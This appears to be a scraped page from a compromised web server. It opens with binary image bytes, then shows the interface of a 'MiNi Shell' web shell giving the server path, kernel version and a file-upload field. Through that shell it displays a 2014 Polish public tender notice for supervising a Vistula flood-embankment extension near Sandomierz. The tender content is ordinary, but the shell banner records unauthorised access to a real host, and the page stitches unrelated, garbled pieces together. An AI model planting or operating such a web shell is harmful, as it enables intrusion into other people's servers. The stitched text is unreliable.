JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140715/154033-N-2014.html

<p class="kh_header"><b>Kielce: Kompleksowy nadzór inwestorski nad realizacją zadania p.n.: Podwyższenie i rozbudowa prawego wału rzeki Wisły w km 0+000 - 3+350 Huta Szkła - Koćmie-rzów w msc. Sandomierz - etap II w km 1+500 - 3+350</b><br>
<b>Numer ogłoszenia: 154033 - 2014; data zamieszczenia: 15.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach , ul. Witosa 86, 25-561 Kielce, woj. świętokrzyskie, tel. 041 3340105 wew. 209, 309, faks 041 3340105 wew. 409.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szmiuw.kielce.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojewódzka samorządowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowy nadzór inwestorski nad realizacją zadania p.n.: Podwyższenie i rozbudowa prawego wału rzeki Wisły w km 0+000 - 3+350 Huta Szkła - Koćmie-rzów w msc. Sandomierz - etap II w km 1+500 - 3+350.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia i miejsce realizacji przedmiotu zamówienia

Kod wg CPV -  71.52.00.00.9 - usługi nadzoru budowlanego.

1.  Nazwa zamówienia.

Kompleksowy nadzór inwestorski nad realizacją zadania p.n.: Podwyższenie i rozbudowa prawego wału rzeki Wisły w km 0+000 - 3+350 Huta Szkła - Koćmierzów w msc. Sandomierz - etap II w km 1+500 - 3+350.


2. Opis przedmiotu zamówienia.
 
Przedmiotem zamówienia jest pełnienie kompleksowego nadzoru inwestorskiego nad realizacją zadania p.n.: Podwyższenie i rozbudowa prawego wału rzeki Wisły w km 0+000 - 3+350 Huta Szkła - Koćmierzów w msc. Sandomierz - etap II w km 1+500 - 3+350, wykonywanego zgodnie z dokumentacją projektową, zaktualizowaną przez Zespół Usług Projektowych i Ekologicznych EKOWODA s.c., ul. Przemysłowa 11, 35-105 Rzeszów. Wykonawca musi zapewnić kompleksowy nadzór inwestorski przy realizacji w/w zadania, w ramach którego będzie sprawowany nadzór inwestorski nad robotami konstrukcyjno - budowlanymi (w zakresie melioracji wodnych).
Przedsięwzięcie przewidziane jest do realizacji w ramach Programu Rozwoju Obszarów Wiejskich 2007 - 2013 Działanie 125 schemat II Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowaniem rolnictwa i leśnictwa przez gospodarowanie rolniczymi zasobami wodnymi, wchodzi w zakres zadania inwestycyjnego mającego na celu ochronę przed powodzią terenów doliny Sandomiersko-Tarnobrzeskiej, obejmujących obszar o powierzchni około 49,0km2 z rozwiniętą infrastrukturą osadniczo-przemysłową. Planowane przedsięwzięcie obejmujące rozbudowę prawego odcinka wału rzeki Wisły należy traktować jako początek długofalowego procesu rozbudowy wałów Wisły w tym rejonie.
Kilometraż omawianego odcinka prawego wału rzeki Wisły rozpoczyna się w km 1+500 i ciągnie się w górę rzeki Wisły do m. Koćmierzów, aż do granicy woj. świętokrzyskiego z województwem podkarpackim (km 3+350).
Przedmiotowa inwestycja zlokalizowana jest częściowo (w międzywalu) w obszarze Natura 2000 Tarnobrzeska Dolina Wisły.
Opis inwestycji oraz szczegółowy zakres rzeczowy robót związanych z jej realizacją przedstawiony został w dokumentacji projektowej oraz w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych udostępnionych na stronie internetowej www.szmiuw.kielce.com.pl oraz w siedzibie Zamawiającego.


Zakres robót, nad którymi sprawowany będzie nadzór inwestorski:
1. Roboty pomiarowe;
2. Roboty ziemne i konstrukcyjne - zabezpieczenie przeciwfiltracyjne skarpy odwodnej wału ekranem z geomembrany PCV grubości 1,5mm obustronnie uszorstkowionej oraz podłoża wału pionową przesłoną bentonitowo-cementową o głębokości 10,0m;
3. Budowa ramp wałowych; 
4. Roboty ziemne i konstrukcyjne -droga p.powodziowa na zawalu;
5.Drogi technologiczne;

Projektowane parametry wału:
- szerokość korony wału 3,00m
- nachylenie skarpy odwodnej 1:2,5
- nachylenie skarpy odpowietrznej 1:2
- wysokość wału od strony odpowietrznej 5,5m
- wysokość wału od strony odwodnej 6,0m
- rzędna korony wału w km 1+500 - 149,87 m n.p.m.
- rzędna korony wału w km 3+350 - 150,48 m n.p.m.

Zakres obowiązków inspektorów nadzoru inwestorskiego określa Rozdział 3 (art. 25-26) ustawy Prawo budowlane z dnia 7 lipca 1994 r. (t. j. Dz. U. z 2010 r. Nr 243, poz. 1623). Inspektor Nadzoru jest przedstawicielem Zamawiającego wobec Wykonawcy robót budowlanych, w granicach posiadanego umocowania określonego w umowie. Inspektor Nadzoru Inwestorskiego winien współpracować z Zamawiającym zapewniając sprawną, zgodną z dokumentacją projektową i pozwoleniem na budowę, obsługę realizacji zadania, jego odbioru oraz rozliczenia, tj. sprawdzania kompletności wszystkich dokumentów Wykonawcy robót budowlanych przygotowanych do odbioru końcowego i ich zgodności z dokumentacją projektową, potwierdzanie dokumentów Zamawiającego związanych z pozyskaniem i rozliczeniem środków finansowych na realizację zadania.

Ponadto przedmiot zamówienia obejmuje: 
a)	Współdziałanie z Zamawiającym w zakresie technicznym, kosztowo-rozliczeniowym.
b)	Udział w przekazaniu Wykonawcy robót budowlanych placu budowy.
c)	Współdziałanie z Zamawiającym w zakresie problematyki robót zamiennych oraz dodatkowych wychodzących poza zakres rzeczowy umowy na roboty budowlane.
d)	Przygotowanie w trakcie realizacji robót projektów aneksów do umów o ewentualne roboty budowlane, zamienne lub dodatkowe, lub opiniowanie takich projektów przygotowanych przez Za-mawiającego.
e)	Udział w naradach technicznych dotyczących wykonywanych robót.
f)	Przygotowywanie wspólnie z Wykonawcą projektu podziału zadania na elementy do fakturowania i odbioru.
g)	Współdziałanie z nadzorem autorskim w czasie trwania realizacji przedmiotu umowy celem rozwiązywania bieżących problemów realizacyjnych dla zabezpieczenia interesów Inwestora.
h)	Udział w załatwianiu spraw spornych z miejscową ludnością oraz skarg wynikających z realizowanych robót.
i)	Dostarczenie w terminie 1 dzień przed podpisaniem umowy oświadczeń inspektora nadzoru wchodzących w skład zespołu stwierdzających przyjęcie obowiązków inspektorów nadzoru nad inwestycją.
j)	Nadzorowanie budowy a także zapewnienie nadzoru inwestorskiego nad realizacją inwestycji, a w szczególności monitorowanie realizacji inwestycji, sprawdzanie obmiarów, nadzorowanie i odbiór robót, kontrola jakości materiałów do stosowania przy wykonywaniu przesłony przeciwfiltracyjnej (kontrola w trakcie wykonywania przegrody, a także po wykonaniu przegrody, zgodnie ze Specyfikacją Techniczną Wykonania i Odbioru Robót), w częstotliwości zapewniającej skuteczny nadzór (jednak nie mniej niż 3 razy w tygodniu); Inspektor Nadzoru ponosi odpowiedzialność za wszelkie opóźnienia, nieprawidłowości lub wady, do których przyczynił się w szczególności po-przez brak zapewnienia wymaganego przepisami prawa lub umową nadzoru. Potwierdzeniem pobytu jest wpis do dziennika budowy.
k)	Bieżąca kontrola - sprawdzanie pod względem merytorycznym i formalno-prawnym faktur wykonawcy. 
Każdorazowe sprawdzanie obmiarów stanowiących podstawę rozliczeń - sprawdzanie kosztorysów pod względem merytorycznym i formalno-rachunkowym
l)	Dokonywanie odbiorów częściowych w terminie określonym w harmonogramie rzeczowo-finansowym oraz udział w odbiorze końcowym zadania, a także nadzór nad usunięciem stwierdzonych usterek i niedoróbek.
m)	Wykonywanie kontrolnych pomiarów geodezyjnych.
n)	Udział w przeglądach gwarancyjnych.
o)	Końcowe rozliczenie zadania wraz ze sporządzeniem wymaganych dokumentów.
p)	Przekazywanie na bieżąco Inwestorowi informacji z rzeczowego i finansowego zaawansowania realizacji zadania.
q)	Współdziałanie z Wykonawcą robót i zamawiającym w celu uzyskania decyzji o pozwoleniu na użytkowanie.
3.	Termin wykonania zamówienia 

Od dnia podpisania umowy do dnia 30-04-2015 r.

Umowa na pełnienie nadzoru inwestorskiego podpisana zostanie po podpisaniu umowy z Wykonawcą robót budowlanych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium przed upływem terminu składania ofert, z uwzględnieniem 30 dniowego terminu związania ofertą. Wadium może być wnoszone w pieniądzu, poręczeniach bankowych, poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest poręczeniem pieniężnym,  gwarancjach bankowych lub ubezpieczeniowych, poręczeniach udzielonych przez podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. 2007 Nr 42, poz.275 z późn. zm).

Wysokość wadium ustala się w kwocie 2500,00 zł (słownie: dwa tysiące pięćset zł 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	posiadania wiedzy i doświadczenia, w realizacji usług odpowiadających przedmiotowi zamówienia tj.:

1.1.	Wykonania w okresie ostatnich trzech lat przed upływem składania ofert - a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch usług pełnienia funkcji nadzoru inwestorskiego lub zastępstwa inwestycyjnego nad budową, przebudową lub rozbudową, w tym wykonanie w ramach tych usług:




1.1.1.	zakresu prac, o którym mowa w pkt. 1.2.1 niniejszego rozdziału,
 
1.1.2.	funkcji nadzoru inwestorskiego w rozumieniu art. 25 Prawa budowlanego nad - 
budowami ( budowa lub rozbudowa wałów przeciwpowodziowych o podobnym charakterze robót budowlanych, co usługa stanowiąca przedmiot zamówienia o łącznej wartości brutto robót nie mniejszej niż 5.000.000,00 zł w tym jedna o wartości min. 2.000.000,00 zł, spełniających łącznie ( tzn. w/w  usługi łącznie - sumarycznie) wymogi określone w 1.2.2 niniejszego rozdziału

1.2.	Przez podobny charakter przedmiotu zamówienia rozumie się:

1.2.1.	pełnienie usług w zakresie rzeczowym wynikającym z opisu przedmiotu zamówienia 
(co najmniej dla jednej usługi), o których mowa w rozdz. I pkt. 1.2 lit.: a, c, d, h, m, s  
w zakresie rozliczenia końcowego i w zakresie realizacji inwestycji. 

1.2.2.	pełnienie nadzoru - co najmniej nad dwoma budowami tj. nad budową lub przebudową wałów przeciwpowodziowych obejmującą roboty w zakresie:

a)	zabezpieczenia wałów przesłoną bentonitowo-cementową w technologii DSM lub z pali łącznej powierzchni, co najmniej 10.000 m2.
b)	zabezpieczenia przeciwfiltracyjnych wałów w formie folii hydroizolacyjnej o łącznej powierzchni dla obydwu budów, co najmniej 15.000,0 m2 ,

1.3.	Na potwierdzenie spełnienia warunku należy złożyć poniższe dokumenty.

2.	dokumentami potwierdzającymi spełnianie warunku, o którym mowa w pkt. 1 muszą być:

2.1.	sporządzony przez Wykonawcę wykaz usług  (nadzorów inwestorskich), o których mowa w pkt 1  we wzorze stanowiącym załącznik nr 6 do SIWZ. W wykazie tym należy potwierdzić spełnienie warunków określonych w pkt. 1.1. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonaw-ców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentów oryginał. 

2.2.	dowody potwierdzające, że usługi przedstawione w wykazie  zrealizowanych usług zostały wykonane należycie, z zastrzeżeniem zapisów par. 1 ust. 2  Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. 2013 poz. 231).
Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę lub upoważnionego pełnomocnika.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania za-mówienia - tj. :


1.1.	Inspektorem nadzoru tj.:

1.1.1.	osobą posiadającą wyższe wykształcenie i uprawnienia w specjalności odpowiedniej do nadzorowania robót z zakresu melioracji wodnych. 

1.1.1.1.	w/w osoba, przewidziana do pełnienia funkcji inspektora nadzoru, winna posiadać doświadczenie w nadzorowaniu robót budowlanych w zakresie wykonania: budo-wy, przebudowy, rozbudowy lub remontu wałów przeciwpowodziowych obejmujących także roboty dotyczące:

		- zabezpieczeń przeciwfiltracyjnych w zakresie: folii hydroizolowanej dwu
    stronnie uszorstkowanej o łącznej pow. min. 15.000 m2  
	       - zabezpieczenia przesłoną bentonitowo-cementową w technologii DSM lub 
           równoważnej z pali o łącznej powierzchni, co najmniej 10.000m2,   


1.2.	 Na potwierdzenie spełnienia powyższych warunków należy złożyć poniższe dokumenty.
2.	Dokumentami potwierdzającymi spełnianie warunku, o którym mowa w pkt. 1 muszą być: 

2.1.	Wykaz osób które będą uczestniczyć w wykonaniu zamówienia, spełniających wymagania określone w pkt. 1 we wzorze stanowiącym załączniki nr 2 do SIWZ wraz z informacją o sposobie dysponowania tymi osobami. W wykazie tym należy potwierdzić spełnienie warunków określonych w pkt. 1 W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentu - oryginał,

2.2.	Do wykazu należy złączyć oświadczenie, że osoby, które będą uczestniczyć w wykonaniu za-mówienia posiadają uprawnienia wymagane prawem - według wzoru stanowiącego załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	sytuacji ekonomicznej i finansowej tj. posiadają zdolność ekonomiczno-finansową do 
realizacji przedmiotowego zamówienia:

1.1.	posiadają ubezpieczenie  od odpowiedzialności cywilnej w zakresie prowadzenia działalności związanej z przedmiotem zamówienia na kwotę co najmniej 500 000 zł.

Na potwierdzenie spełnienia warunku należy złożyć poniższe.

2.	dokumentami potwierdzającymi spełnianie warunku, o którym mowa w pkt. 1 muszą być:


1.1.	warunek w zakresie pkt. 1.1  - opłacona polisa a przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę lub upo-ważnionego pełnomocnika. Przedłożony dokument winien potwierdzać spełnienie warunku określonego w pkt. 1.1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Inne dokumenty wymagane w postępowaniu przez Zamawiającego: 

1.1.	 Wypełniony formularz ofertowy wg wzoru określonego w załączniku nr 1 do SIWZ     Wymagana forma dokumentu - oryginał.

1.2.	Pełnomocnictwo - jeżeli upoważnienie do podpisania oferty nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy - nie dotyczy pełnomocnictwa w zakresie oferty Wy-konawców wspólnie ubiegających się o zamówienie. Wymagana forma dokumentu oryginał lub kserokopia poświadczona notarialnie. 

1.3.	Pełnomocnictwo w przypadku oferty Wykonawców występujących wspólnie o udzielenie zamó-wienia, o którym mowa w rozdz. IX. Forma dokumentu oryginał lub kopia poświadczona nota-rialnie. 

1.4.	W przypadku wykonywania dyspozycji pkt. 6 rozdz. VII SIWZ, czyli w sytuacji kiedy Wykonawca wykazując spełnianie warunków, udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Wykonawca w celu udowodnienia Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, załącza do oferty:

1.4.1.	pisemne zobowiązanie  podmiotów  do oddania Wykonawcy przez dany podmiot(y) do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamó-wienia. Wymagana forma dokumentu - oryginał

1.4.2.	dokumenty, o których mowa w par. 1 ust. 6 pkt 2  Rozporządzenia Prezesa Rady Mini-strów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać za-mawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. 2013 poz. 231) 

-	Jeżeli zobowiązanie, o którym mowa w pkt. 1.4.1 w swojej treści wyczerpuje wszelkie przesłanki, o których mowa w par. 1, ust. 6, pkt 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. 2013 nr 0 poz. 231) Wykonawca nie jest zobowiązany do przedkładania dokumentów, o którym mowa w pkt. 1.4.2.   



1.5.	Stosownie do art. 26 ust. 2d ustawy, listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, albo informację o tym, że Wykonawca nie należy do grupy kapitałowej - wg wzoru określonego w załączniku nr 7 do SIWZ. Wymagana forma dokumentu - oryginał. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument ten składa każdy z Wykonawców osobno.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne postanowienia, które zostaną wprowadzone do treści umowy.


1.	Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w przypadku zmniejszenia zakresu robót i wynagrodzenia Wykonawcy robót budowlanych

2.	Wzór umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szmiuw.kielce.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, ul. Witosa 86, pok. 209.</p>
